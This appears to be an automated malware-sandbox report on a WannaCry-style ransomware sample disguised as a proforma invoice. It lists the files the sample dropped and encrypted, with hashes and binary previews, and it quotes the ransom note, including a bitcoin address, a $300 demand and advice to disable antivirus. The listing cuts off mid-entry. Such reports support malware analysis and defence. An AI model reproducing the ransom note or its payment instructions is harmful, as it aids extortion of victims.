                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

                                                          C:\Users\user\Documents\LIJDSFKJZG\@WanaDecryptor@.exe.lnk

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................

                                                          C:\Users\user\Documents\LIJDSFKJZG\AQRFEVRTGL.pdf

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.782252994580477
                                                          Encrypted:false
                                                          SSDEEP:24:Qf26G7obyAr2qPiBGLWN/PMytcrWDS9asbh7fEi:BUyAKqPiFWRrWbACi
                                                          MD5:32BCBD5C41C7B80F3C9CB2316F848ABB
                                                          SHA1:25B4E70583A98EF40F0C9CD68AE9250F5DFF229A
                                                          SHA-256:B69412CDD54229ED9E09471BA62DD506F2C7B9F5C7D64D6BD9C91540234D94AD
                                                          SHA-512:46DAC914E59BE4F5DA639737B7CFE7663E30CABAE54C323D64B20C128D03A3F1806C94B812C480A67A39803EED001E054F66FF3610A3419B26B4D349813E6F13
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:C.R....P..u.sF.!.....lG+... ..{$yL.,....aZ.I.....(.B.P.B9=[...Z...h<#..\.F.s.#5..r.3G.....Z.aRJ.VK...i. A;*k......M:._.0.E..w.NR..... ..N.*..........f...... ~,..L..?.6.c....h.E....j;#`.%.V.}.L.S.....9.j.9.s...<.#.h\.......&....;...9w....2....Y....O).....DHKI.?.A)..m.TqN6\.c.xw..d.;....0.y.9.!.%.).......K0..\.^.HL&-..|8..>r...*\{.S...;.....Z@z...8.i.|..Z.C....~..(.................Z0.....Pi.%< .W..g...i...w.@+.2.W]....ee.5s.t....E`c.f.b.t.hb..D....2...1..x..-..1....=ks.A4c..C...J.....r.E......sA{.....!N.W...YW.|*x9.,..7.38.;^.(.Z...R.`+.1e%=..\_.k".%..:..M./.^/...v..(f..l.6.......U.!...U.?w...,....A.R"w(8....7]`>,...F.I..G.w..*K...Y....,.<.....\..a..Y.....).L....~.|...x}.~.[0...:..)...*.....Y..x-.M9...s.F.=bbXV/.3..p&{ Nt...!...z.Nk.qFbtr`...] *o..... ......&}C.]W...5.+. K.j.A-..2..:._..R.s*(j.....R.N.......dD.ct).j.o....^.O n....P..E4c.E..MD.(#.Rc.......qk.?....s..D...1;.3 8.:.<r.6h.c.vc..[d.....>.xrZ..q:...,......K..<...d.W..lUT.zO.=-.up...+(..

                                                          C:\Users\user\Documents\LIJDSFKJZG\AQRFEVRTGL.pdf.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8464708085417465
                                                          Encrypted:false
                                                          SSDEEP:24:bkzYT6W4uEIa0gjqviZoPs6DQxRiBFx2qyq4y/QmGoi3ccBhb5GzrmL:bkO6WU9wsopDQxuFryq4yh63tBhbAzrq
                                                          MD5:7E99F4B545CCF89AF4EB30B50341A749
                                                          SHA1:AE3D1F987F8058DE7DDA174EBAE933D176BEE88B
                                                          SHA-256:D60E42040E9D13D5E7760623049B06971AF14E3261E66BFCFAD44A74018B22A6
                                                          SHA-512:F31C58C610DEE48768D39F1A326160EED205787C3E4CCB49A1834A378AEA616AA251FC5F8B4A37540F9BBCA5670E431EC9B195430265F3A33DBF79B5E9C2FB64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........q..i../...gi....9.G.C...%.V..e..)}...~.>.M....^...V....%.|.e.?.e.s ......AE&...O.Lr..........D.K...K.)..@..@..7@/.r...RU.Fl<..P..G-<t.}..e..1w..y..\_..)..4K.=.....$(..0..o........P$.5P.T.|U.;...~.pm.P6....|M.dI....M.ZN...V...".f..:.Z&!..K.....................S.>>`.gM.E.k]../..T...A2..8...%...0.4.h.........=...{qk.....K..'d.KL....=m J.G.mf.c...!^.J3\......%HL...$......7..b...*.......A&...+...65i`.S..Q..X.(#.y...$L..V..{.kF....AJk....+j......#.[36..u-....g#.(.........g..8Xg..H..+....O.q.{.efk..=7.....X.m!..XQf.....p.e.....p..oF4..e..&mk.t...._....j|'.....9.......!|O.v.r...)...3.i#.<N......J..<.f.g-Vj.rtT.@..<N[.m.....]%..~....#.Qf..;..d9v..M.SU%.....q.kX...I...1..\...B.8>.j....4( ...g~.A7.N..l.VC..w.....5J.I...N..j.2... ...f....R.`...6.hDa.>IJ..Y|h...U*5..m.b|@.n).XYz.cj...a..(#..>v.....1....#.r.i...Cr.. .|GXt(..F.rm.a....2.9dt...."..........B....h.e...bb.9.....M.c../9.F[..N........~.7.||9..LJ.M.+aRn..[.n5^xRJ.K....

                                                          C:\Users\user\Documents\LIJDSFKJZG\AQRFEVRTGL.pdf.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8464708085417465
                                                          Encrypted:false
                                                          SSDEEP:24:bkzYT6W4uEIa0gjqviZoPs6DQxRiBFx2qyq4y/QmGoi3ccBhb5GzrmL:bkO6WU9wsopDQxuFryq4yh63tBhbAzrq
                                                          MD5:7E99F4B545CCF89AF4EB30B50341A749
                                                          SHA1:AE3D1F987F8058DE7DDA174EBAE933D176BEE88B
                                                          SHA-256:D60E42040E9D13D5E7760623049B06971AF14E3261E66BFCFAD44A74018B22A6
                                                          SHA-512:F31C58C610DEE48768D39F1A326160EED205787C3E4CCB49A1834A378AEA616AA251FC5F8B4A37540F9BBCA5670E431EC9B195430265F3A33DBF79B5E9C2FB64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........q..i../...gi....9.G.C...%.V..e..)}...~.>.M....^...V....%.|.e.?.e.s ......AE&...O.Lr..........D.K...K.)..@..@..7@/.r...RU.Fl<..P..G-<t.}..e..1w..y..\_..)..4K.=.....$(..0..o........P$.5P.T.|U.;...~.pm.P6....|M.dI....M.ZN...V...".f..:.Z&!..K.....................S.>>`.gM.E.k]../..T...A2..8...%...0.4.h.........=...{qk.....K..'d.KL....=m J.G.mf.c...!^.J3\......%HL...$......7..b...*.......A&...+...65i`.S..Q..X.(#.y...$L..V..{.kF....AJk....+j......#.[36..u-....g#.(.........g..8Xg..H..+....O.q.{.efk..=7.....X.m!..XQf.....p.e.....p..oF4..e..&mk.t...._....j|'.....9.......!|O.v.r...)...3.i#.<N......J..<.f.g-Vj.rtT.@..<N[.m.....]%..~....#.Qf..;..d9v..M.SU%.....q.kX...I...1..\...B.8>.j....4( ...g~.A7.N..l.VC..w.....5J.I...N..j.2... ...f....R.`...6.hDa.>IJ..Y|h...U*5..m.b|@.n).XYz.cj...a..(#..>v.....1....#.r.i...Cr.. .|GXt(..F.rm.a....2.9dt...."..........B....h.e...bb.9.....M.c../9.F[..N........~.7.||9..LJ.M.+aRn..[.n5^xRJ.K....

                                                          C:\Users\user\Documents\LIJDSFKJZG\HMPPSXQPQV.xlsx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81852808756566
                                                          Encrypted:false
                                                          SSDEEP:24:HMlnB6eczFAOOLFmOa0FVtQAKh3GCj0l88e2efmfVBa:A3cvO5xoACGCj0lNUfQC
                                                          MD5:84F7A2B880AE174CC4551756013B3B54
                                                          SHA1:F9D9E1DBB0EC1407F8310522B488261548253E45
                                                          SHA-256:2F8F4D197948FE948FF9789EE130F8D6147F6167C0F49C0854D3BC36128F341A
                                                          SHA-512:94514F78CA07E2673BDBD287CB8F801E4DEC34D302E2A5FD57E157F14BF08A78BAD38A971E7E0DE64CE5C9A77BBF54D9AA881D109E0910F8B910FA1155E56BAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:[.i.......N>.@....L...8..YH.!......R.L</c.2)......Z.X.#.Q.J......U(....!..R....p.U.]^.3....[.[...3..&..{....Q p...U;S..>...Q...E...=.._.....L *.4K.a...4......Xk....?\r.Bv...{N.H.......h..:..F..`*^.Fw.........R>.2.2,.j...5..rx...8.Q?V./(..W#...`.$.....QU.......P'....!VW.pF9=3u.Cg..$w...;.Sb.^.f.c1...88'.ts6.^x.].X...2..:.......ik.................A..%.;s.k.I..<>..He.&.w.ch..{y!.(.r^..RO?..!.=..3.2....5)b..<.2&...ur.,s..z....2..i......k.h.S...o....i..x..B.."..l.o.v..&E.r..=2y....f.........{.kl.c{....,..ni.9..[..:./>..@}.A..pZ.S\......l.Qx.5............J..y-.....;q.T..MN..f.4^X..1W.N...w..q.H.H.QS......-@..S...<......m...a....L...%....)`...y".>=..]D.}J.~..n*&u........9...!v.....=M...V...VO.V}..G...nouH..<..jwbdww.}.F..6]......K.'...m.K.>..=,.g.'....Ho...G.r.,.E..gn.....*x.==sk.)..$.2.&.9.(..rAf#.(G.qR...c.B..>.....&..x...._s$..[.W.....L.........%.~Q.....a.....,$.8......'3....x.9.m..Q.^.`.b.~.....u.7.c"..S....rd1.r.71.1....d.z_.I.^..&+.?.

                                                          C:\Users\user\Documents\LIJDSFKJZG\HMPPSXQPQV.xlsx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8660267049541694
                                                          Encrypted:false
                                                          SSDEEP:24:bk/krBbF6oC+9eeB/W1n4zlFCLD912cK6UmnTPPi1myY261yfVn:bk/WBbJFK6CN1Y0DGRyI
                                                          MD5:B6351C2137616149218D2F772A5912A1
                                                          SHA1:0B825BCD1C063AF2DB647F3D16891595A6B42285
                                                          SHA-256:5E728AADE656F5898297A088A6B8E685D63AE23BCD61E19E9B45D9B506ED6494
                                                          SHA-512:70E4EF3716E80F324AED35ED31C9B837853A639B29C24538A9477BA039AE69220189B2A47CA86D49B96FFE09B152D74EF1C248C7527401C1563A2E4CF8664FCD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....../ZPL.O}....v.....V?...^b...#O..(....\.......q.._./He.=Mb%H..[....~?#p.F...../.e_.....DH..6.v.p..JF5.yD;x....F.:.g....c..Cq..#.7<..1...;.$cFJ[.{}g.rwJ.d.|..`.Rpd.o...c~.....[.N/V<B.8{..._G '*.W3.].iz..RP.+........Jqq. ..~..<j....!.C.7h....%.8................... `be..t...dH[X...V4/..my..0...lBz...{.[O.....k.F...._....W4=...K.B.WF3...f..>=.H.. ....Y.. .j*{...\$.Xh...jm.......()Y......S?..u./...1......r...W!......ESC..........+.]K.K...s..(..<V./....x...n..w%......BPz.hh...|....Of.&g...............X.qc..PC0..;P..Y.........1.....z..V8.7s..F.@.Dg...o.{...`.D...*1R.c.;...\K.V...J......E...m;c..!?..}.b..v..;....M:..6..6.X.U.....v......~S{1...m/xU ..lg.Y....9..d.."..o ...(y.}.-6T}.E.gc,l.w.....'...&_.]CI.0...+y6l......mR......%..d..Y:....M.To...~.GDd..!?..wq.n.4..b.W..V[.._W:Z.3j.I#.s....6%.$!E.rX.}.(.....21."c...$...LG5..CN..8.....l6I..`...3..._........6.S....,9..Q}.^.ow..D.....o..!..I..[.\....X1.5.(3..:j.*..V.v.G.......;.|.p6...c..y.

                                                          C:\Users\user\Documents\LIJDSFKJZG\HMPPSXQPQV.xlsx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8660267049541694
                                                          Encrypted:false
                                                          SSDEEP:24:bk/krBbF6oC+9eeB/W1n4zlFCLD912cK6UmnTPPi1myY261yfVn:bk/WBbJFK6CN1Y0DGRyI
                                                          MD5:B6351C2137616149218D2F772A5912A1
                                                          SHA1:0B825BCD1C063AF2DB647F3D16891595A6B42285
                                                          SHA-256:5E728AADE656F5898297A088A6B8E685D63AE23BCD61E19E9B45D9B506ED6494
                                                          SHA-512:70E4EF3716E80F324AED35ED31C9B837853A639B29C24538A9477BA039AE69220189B2A47CA86D49B96FFE09B152D74EF1C248C7527401C1563A2E4CF8664FCD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....../ZPL.O}....v.....V?...^b...#O..(....\.......q.._./He.=Mb%H..[....~?#p.F...../.e_.....DH..6.v.p..JF5.yD;x....F.:.g....c..Cq..#.7<..1...;.$cFJ[.{}g.rwJ.d.|..`.Rpd.o...c~.....[.N/V<B.8{..._G '*.W3.].iz..RP.+........Jqq. ..~..<j....!.C.7h....%.8................... `be..t...dH[X...V4/..my..0...lBz...{.[O.....k.F...._....W4=...K.B.WF3...f..>=.H.. ....Y.. .j*{...\$.Xh...jm.......()Y......S?..u./...1......r...W!......ESC..........+.]K.K...s..(..<V./....x...n..w%......BPz.hh...|....Of.&g...............X.qc..PC0..;P..Y.........1.....z..V8.7s..F.@.Dg...o.{...`.D...*1R.c.;...\K.V...J......E...m;c..!?..}.b..v..;....M:..6..6.X.U.....v......~S{1...m/xU ..lg.Y....9..d.."..o ...(y.}.-6T}.E.gc,l.w.....'...&_.]CI.0...+y6l......mR......%..d..Y:....M.To...~.GDd..!?..wq.n.4..b.W..V[.._W:Z.3j.I#.s....6%.$!E.rX.}.(.....21."c...$...LG5..CN..8.....l6I..`...3..._........6.S....,9..Q}.^.ow..D.....o..!..I..[.\....X1.5.(3..:j.*..V.v.G.......;.|.p6...c..y.

                                                          C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.82126842594817
                                                          Encrypted:false
                                                          SSDEEP:24:ZNkHLExWn9gcKhbdV1XNECwzGphnEWFfeP5yLXTOK7GRTx4:j+EILybj8HQhnA5mhGRW
                                                          MD5:5E2FA6BCCD72E2339910C266102B9D95
                                                          SHA1:A85DFA83764C7D43C361C919DF5A3D61C5232687
                                                          SHA-256:2FD7B3CD2AA0088EA92E23CC05CC254AE0F3E15CD5ADAE8F8B1E13C3F91CD0CA
                                                          SHA-512:38E1F7391114994CDF9A7D7324DF990226601BCB5F3E4F5FEE3B08F5C9F4725B77E9E2ECC538DF35C462687F0AEC8B59521ABDAD0EE6DC875DD8FD162FD0CE8E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:p..w&..dQ)F..[qj{.y....?)...s.B.bpM..G....e....n...E....3....|f...}......T...2#..z._*.8..~r._.$..C..].J64.../...|.%E.F..u.H...`..K9,]....m.[..{.E.I:........yh..Gx3ecI98.N~......wT.V3K../.Z...kK...........).;^4!.d....F.T..E..].3....7.e . C.h.b....8..|.z...W~.^.....#.D.i.^...ly$]..T.R.+a{...m.q/...^y. e...W4.cL....@.0....1..APV......i....P."..1.......ZB. -...q...*`....U..U....T.......{..v'0..3.Sk......$..s.=..!.;.rj%.Z.3F\.c\.>....o.......K......).)..R.7.....H0u.&.y...FH...Vt.....|.."t..jI.;....V.S.A.L..........f}2.r.U....!bV...sf0....B3.u.....Q...}....)R>*.3o.^'6...uI.....bR._.....$9.0........7...(0.{G..le.2....AI...^.!...:.....8.Zc.fg...`.k9..V(.^.a...Tr..R...K5.d...H`.C..........l..y.okR]X....;.}VT=...?...I...f.......V..=..,S].....\....4..q.....a.^.'.Q...Z.f!0Yf>C..e........$.sn.,.u3..:..F....Z..9y|2..h.Z....|.Qt:..d.$.<..!..<.V)b...,..k..]....3..L....B...b.A...........@.....$..*..|.....h]...<s...v....1..g..]...yQ.+.}..W..n...O..

                                                          C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.824738999690493
                                                          Encrypted:false
                                                          SSDEEP:24:bkzyh1HBqbdVbwiSGxUZvP5O8mMMbVW0jm3W8ebVIC8jNR55pFncVS:bkGDhqbzblsdxkVBw/eF8Bd
                                                          MD5:E7EFFFFB6872669266924568EA3F0FCD
                                                          SHA1:2088181CECC4BE85456B2779F6ADAF470917EA18
                                                          SHA-256:E333ADD88CBB558F616125CAE7A9FBCF1D5D4CADAA1C0FEB4922363BCCBCE85C
                                                          SHA-512:8635B888B681031EF8512C83D74C683C994C5452112B9AC6B77E95C47E5545811B28E343026438E66F0057FA8A55665B747790FF06761DEB2FB9E5470831DD47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........F.....yZ.i..qS..Y.B.6g.u./...B.P....F."m...9..t..s..vG.b4.........g.....IvO...c...s.`.;...A..{.....?.P..4).qk.\.......L..q@8..`B...z....I.]x.._...uC..$.,.s....Fm..$8(N.F?...F.=....f...v`u..c.....6 .g.....-..a....)w.J..f.k..2...x...v,5..0A..............x.s.,.R.K.u.4M$....m.7.K.....Y.A.aYY>T.d.N.$.gn..............S.....A#..m..Y......'."..s..........O.1...)R...i.,.....3`.c5..........X<K....k....I.x.....x.{....$..,....D'..|D...#.ed..B4.....JA+.Y,..f.H>...".7.]U.M.<........@..O..q.H.....,... ..2?![=T........y...KA........&....f.aK7./V...b......#!9......y...z.........2.F.p&.....K...w....,.w...7..Y.j.&y.F=.Xp..#P.a.......s$3...{.x......=U....."..J.R...k..B.i..|...@.[.......g.S..N.t.#.D....H....lu.<.o...._....n......Rv...t@Y.E..?..R.d;".......7.C.....Xn.L...p.w.........-....2..k.%G..!....c...K.......~.[.!...TNB.....a....{l..-..Z.......<?.........h..n.'.#.F.}..'....IF...c..^(.zjq.:.m.&dJf.7T.n.~C.....Sd.v3,!....).'..`..

                                                          C:\Users\user\Documents\LIJDSFKJZG\LIJDSFKJZG.docx.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.824738999690493
                                                          Encrypted:false
                                                          SSDEEP:24:bkzyh1HBqbdVbwiSGxUZvP5O8mMMbVW0jm3W8ebVIC8jNR55pFncVS:bkGDhqbzblsdxkVBw/eF8Bd
                                                          MD5:E7EFFFFB6872669266924568EA3F0FCD
                                                          SHA1:2088181CECC4BE85456B2779F6ADAF470917EA18
                                                          SHA-256:E333ADD88CBB558F616125CAE7A9FBCF1D5D4CADAA1C0FEB4922363BCCBCE85C
                                                          SHA-512:8635B888B681031EF8512C83D74C683C994C5452112B9AC6B77E95C47E5545811B28E343026438E66F0057FA8A55665B747790FF06761DEB2FB9E5470831DD47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!........F.....yZ.i..qS..Y.B.6g.u./...B.P....F."m...9..t..s..vG.b4.........g.....IvO...c...s.`.;...A..{.....?.P..4).qk.\.......L..q@8..`B...z....I.]x.._...uC..$.,.s....Fm..$8(N.F?...F.=....f...v`u..c.....6 .g.....-..a....)w.J..f.k..2...x...v,5..0A..............x.s.,.R.K.u.4M$....m.7.K.....Y.A.aYY>T.d.N.$.gn..............S.....A#..m..Y......'."..s..........O.1...)R...i.,.....3`.c5..........X<K....k....I.x.....x.{....$..,....D'..|D...#.ed..B4.....JA+.Y,..f.H>...".7.]U.M.<........@..O..q.H.....,... ..2?![=T........y...KA........&....f.aK7./V...b......#!9......y...z.........2.F.p&.....K...w....,.w...7..Y.j.&y.F=.Xp..#P.a.......s$3...{.x......=U....."..J.R...k..B.i..|...@.[.......g.S..N.t.#.D....H....lu.<.o...._....n......Rv...t@Y.E..?..R.d;".......7.C.....Xn.L...p.w.........-....2..k.%G..!....c...K.......~.[.!...TNB.....a....{l..-..Z.......<?.........h..n.'.#.F.}..'....IF...c..^(.zjq.:.m.&dJf.7T.n.~C.....Sd.v3,!....).'..`..

                                                          C:\Users\user\Documents\LIJDSFKJZG\QFAPOWPAFG.mp3

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817610163643991
                                                          Encrypted:false
                                                          SSDEEP:24:ScFgx3uPkuakUndwpAzK9GqlSkKx0o/NUDI94sezvf:3FIe8pdJu9VWNkIvg3
                                                          MD5:F5F81660FE1310BD8C724E6E20EBF545
                                                          SHA1:8B01AFD147AA7C1F63C8777FAC0EC5E2541EDD3F
                                                          SHA-256:3794B37F75980A2B3D98221F96822604EACBC6054DEF7D407F0C155EB234B455
                                                          SHA-512:C6F7D2BE60D4FE8BEB93B50F75AC4485A337CB6F4E01619318D2376AB36EFEDB532E26180ECC77FD29D991C9DAC20EAD4DC44D009CFD4D2FEE446DB5C8C0B5E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:P.K..|.m.W.o....iX!...3..6.0E...s1.?.{C..=.m.....X.l.3.o=L.....0....u<[a....g.....r..........f.^...5\. )[.G).q.....7..'...P.lJ..`..../.EM....G<t.Z.$..3P.#|.t.._<.v...|...Yk..1L_.;...8.8.(.u......z.-....0 .p.p.6....8/...8....c...z!.A^.;<j......,........i-..0..$DP}.k.|......Z.B.A..dD....j@..x@...y*N........k.x..H../..V:.o.k..]....Xp.......B..5|.(q....RT!..W...K..@......B..z._..c|.cM-......Y5.g..d.W....W."Gp;..r.......|.......d.^".[..Y.S..o....A*^........."....u.;x.T.........c.Z.....".9.H...H.3.o2....^a3...q..v...i.%.4..z5.M.X._.D.K.M...%G.|a.h.)..n......K......NNvG<.4!..........3M...,Fd...cS9....._.....C4aMj.5.Uf.O.sO.F<..S..}.....V..+r..........V.{.[h..[t..:&.>.....&K.e6.UQ0.GL/.a..V...\.k...Q........n...*...1&.Y..r.a}k}C../J......VN.Dm.<.6.........9.3...?..Z...+V.a.....m/..S?.F........f)X.\.[h..%Z.a..l...V....i.~w.h....I...........8.$?.+...QGITs...0..8f..@..u........"."W:...;<pc.Jb..h.7...o.S.M.bD.go91.'..cX.....c..us....f

                                                          C:\Users\user\Documents\LIJDSFKJZG\QFAPOWPAFG.mp3.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835334446692858
                                                          Encrypted:false
                                                          SSDEEP:24:bk76jSpRanqnS4Gt6ljWQT8roxmny69LphCKs+6WrV+vR08AY9kgeCwILUvkMAMd:bkkSeT+juoxmyOpIIbpm0vgk2wIckBA
                                                          MD5:5C3563FC1006045A7FBBBB615FFDE551
                                                          SHA1:AC9515E5F285D6ACE2BDA3B10EE04B0EF2E5ED96
                                                          SHA-256:D137A197D301A3BF1B40FFF821218693324FE2627F569554F4FD2D831D9A5714
                                                          SHA-512:42AA87BFFC3290044E7E1F2FC957D3F6D1C0A5875A77DEE2EFA11ECF9E6FF8D348AAC4F71DCA970E05AA0D5C8C8C5FFC283F35D751AE67670180243B8A44A024
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....d..w}.&5Z...A.F...gn#-K..&...V_.._....BX..e#\D*...v..2l..ZA.1.yq|..).@=.6..F......,wy.#...s7........V....B.<..(.x......{..!^y...?t.xN...}..._..k-...).K.3"....`.}..$.....L..0.....9p....x.|).|...*..(.n..D..I.z.M.<.og0.GBB..=.z....F..W.0...B............)....v....S...../'..8o.....+....7.....G...!..?.b...g..!L....fm.A..lVc.A..L.q....r.....>..y.O.....{...T..T...(..]y.....>.h.......f.n+R..Z..{t...yp..p....l.k.[.+W...<Y.2=mk.#H.}...^....4.:.E..]Uy...,5I.....d6.......Q..X.c#..>.5..L.z..zo.1.w..s.....[{...%a....k..Pd...;....G@*..1n%y.U...wp...L.J...8....3(j..E...~...T..k....Q...l...*l.2.A!0O.b.J3.....-.....d.P.....@.4.G..(9..z@^@:..~....4.h..6.Pt`t...R.......~.r....t...nq=.;...4.....U.6./...l.:.^*....I9E.bnft....5........x.....(F.@..'f..H....$.]P.'.m`.\..-..t..'...S..h...p.....e%4.;.:...Fbn....G~...}{.Ik.0...H....]...:.%. ...6U.6...&.<jV.NYT..?f....g8....gV....F.5....]........v.E.M{.cu.r.T%..v.kj..Wfle^jH<:.h...$Q ...q.;.K.n.H.u

                                                          C:\Users\user\Documents\LIJDSFKJZG\QFAPOWPAFG.mp3.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835334446692858
                                                          Encrypted:false
                                                          SSDEEP:24:bk76jSpRanqnS4Gt6ljWQT8roxmny69LphCKs+6WrV+vR08AY9kgeCwILUvkMAMd:bkkSeT+juoxmyOpIIbpm0vgk2wIckBA
                                                          MD5:5C3563FC1006045A7FBBBB615FFDE551
                                                          SHA1:AC9515E5F285D6ACE2BDA3B10EE04B0EF2E5ED96
                                                          SHA-256:D137A197D301A3BF1B40FFF821218693324FE2627F569554F4FD2D831D9A5714
                                                          SHA-512:42AA87BFFC3290044E7E1F2FC957D3F6D1C0A5875A77DEE2EFA11ECF9E6FF8D348AAC4F71DCA970E05AA0D5C8C8C5FFC283F35D751AE67670180243B8A44A024
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.....d..w}.&5Z...A.F...gn#-K..&...V_.._....BX..e#\D*...v..2l..ZA.1.yq|..).@=.6..F......,wy.#...s7........V....B.<..(.x......{..!^y...?t.xN...}..._..k-...).K.3"....`.}..$.....L..0.....9p....x.|).|...*..(.n..D..I.z.M.<.og0.GBB..=.z....F..W.0...B............)....v....S...../'..8o.....+....7.....G...!..?.b...g..!L....fm.A..lVc.A..L.q....r.....>..y.O.....{...T..T...(..]y.....>.h.......f.n+R..Z..{t...yp..p....l.k.[.+W...<Y.2=mk.#H.}...^....4.:.E..]Uy...,5I.....d6.......Q..X.c#..>.5..L.z..zo.1.w..s.....[{...%a....k..Pd...;....G@*..1n%y.U...wp...L.J...8....3(j..E...~...T..k....Q...l...*l.2.A!0O.b.J3.....-.....d.P.....@.4.G..(9..z@^@:..~....4.h..6.Pt`t...R.......~.r....t...nq=.;...4.....U.6./...l.:.^*....I9E.bnft....5........x.....(F.@..'f..H....$.]P.'.m`.\..-..t..'...S..h...p.....e%4.;.:...Fbn....G~...}{.Ik.0...H....]...:.%. ...6U.6...&.<jV.NYT..?f....g8....gV....F.5....]........v.E.M{.cu.r.T%..v.kj..Wfle^jH<:.h...$Q ...q.;.K.n.H.u

                                                          C:\Users\user\Documents\LIJDSFKJZG\VWDFPKGDUF.jpg

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.824193176060253
                                                          Encrypted:false
